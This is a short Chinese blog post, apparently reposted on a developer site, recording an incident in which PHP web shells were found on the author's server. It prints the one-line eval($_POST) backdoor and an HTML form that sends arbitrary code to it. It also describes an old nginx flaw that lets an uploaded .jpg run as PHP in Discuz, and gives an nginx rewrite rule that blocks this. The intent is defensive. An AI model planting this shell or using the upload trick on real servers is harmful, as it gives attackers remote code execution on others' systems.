前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >关于php一句话木马

关于php一句话木马

作者头像
全栈程序员站长
发布2022-08-31 11:39:38
1.1K0
发布2022-08-31 11:39:38
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

服务器上发现被植了很多木马,而且还让人肆意使用…NND

代码语言:javascript
复制
<?php @eval($_POST['c']);?>  

使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行

代码语言:javascript
复制
<html>
<body>
<form action="a.php" method="post">
<input type="text" name="c" value="phpinfo();">
<input type="submit" value="submit">
</form>
</body>
</html>

关于php一句话木马
关于php一句话木马
关于php一句话木马
关于php一句话木马

仅此做个记录,php一定要做好过滤系统。一定要处理上传的东西。

nginx 上传漏洞及 discuz 漏洞处理

由于nginx早期的版本,至少我在用 0.9.X 的版本依旧存在漏洞,导致处理过的图片可以执行php代码 简单的说就是写好的php代码将扩展名改为图片,如 xx.jpg 文件后通过 discuz 等开源论坛的上传功能上传后可以通过 http://xxx.com/bbs/data/xxxxxxxx/xx.jpg/1.php 方式执行 xx.php里面的代码 对于discuz 论坛使用nginx的服务器可以使用rewrite方式防止代码执行

Nginx.conf代码

  1. rewrite ^/bbs/data/.*\.(jsp|php)$ http://www.xxx.com/ break;

其他如source及其他文件夹下也存在各种各样的问题,简单的处理方法也是禁止php的运行

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/143374.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年5月2,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • nginx 上传漏洞及 discuz 漏洞处理
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档